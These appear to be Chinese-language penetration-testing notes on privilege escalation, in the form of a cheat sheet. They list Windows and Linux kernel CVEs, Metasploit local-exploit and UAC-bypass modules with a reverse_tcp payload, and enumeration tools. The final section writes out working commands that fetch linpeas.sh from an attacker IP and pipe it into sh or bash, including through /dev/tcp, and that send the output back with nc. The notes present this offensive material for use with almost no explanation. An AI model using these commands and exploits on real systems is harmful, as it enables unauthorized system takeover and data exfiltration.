用户权限说明

Windows

Users               # 普通用户
Adminstrator        # 管理员用户
Sytem               # 系统用户
TrustedInstaller    # 最高权限用户(服务)

Linux

root    # 超级用户
sshd    # 服务用户
kali    # 普通用户

两种提权方式

  • 横向提权

  • 纵向提权

Windows 权限提升

内核漏洞提权

CVE-2018-8120.exe

meterpreter > upload /home/kali/Desktop/CVE-2018-8120.exe C:\\users\\xxx\\Desktop\\CVE-2018-8120.exe
meterpreter > shell     【chcp 65001】
C:\Users\xxx\Desktop>CVE-2018-8120.exe "whoami"

永恒之黑

msf6 > search CVE-2020-0796
msf6 > use exploit/windows/local/cve_2020_0796_smbghost
msf6 exploit(windows/local/cve_2020_0796_smbghost) > set session 4

getsystem

错误配置提权

错误配置

注意架构问题

msf6 exploit(windows/local/cve_2020_0796_smbghost) > use exploit/windows/local/service_permissions
 msf6 exploit(windows/local/cve_2020_0796_smbghost) > set payload windows/x64/meterpreter/reverse_tcp

计划任务

注册表

DLL

数据库提权

绕过权限提权

bypassuac

use exploit/windows/local/bypassuac
 use exploit/windows/local/ask

CS 插件提权

辅助提权

靠山吃山

https://lolbas-project.github.io/#

windows-exploit-suggester.py

winPEAS.bat

其他

访问令牌提权

土豆攻击

Linux 权限提升

内核提权

CVE-2016-5195

脏牛漏洞

CVE-2022-0847

脏管道

CVE-2021-4034

CVE-2024-1086

searchsploit 筛选

错误配置提权

crontab 计划任务提权

suid 提权

u+s

sudo 提权

辅助提权

靠山吃山

https://gtfobins.github.io/

谷歌搜索

https://www.exploit-db.com

优雅的运行 linpeas

1、落地执行
 最常规的方式 -> 上传/下载 -> 给权限 -> 运行 -> 查看结果  
 
 
 2、不落地执行
 目标设备:curl -l http://192.168.4.249:12345/linpeas.sh | sh
 
 
 3、不落地执行,并将执行输出回攻击机
 目标设备:curl -l http://192.168.4.249:12345/linpeas.sh | sh | nc 192.168.4.249 81
 
 
 4、不落地执行,并将执行输出回攻击机并且保存成文件
 攻击机:python3 -m http.server 12345
 攻击机:nc -lvvp 81 | tee linpeas-result
 目标设备:curl -l http://192.168.4.249:12345/linpeas.sh | sh | nc 192.168.4.249 81
 
 
 5、无wget/curl命令情况下执行
 攻击机:nc -lvnp 81 < linpeas.sh
 目标设备:cat < /dev/tcp/192.168.4.249/81 | bash

linux-exploit-suggester.sh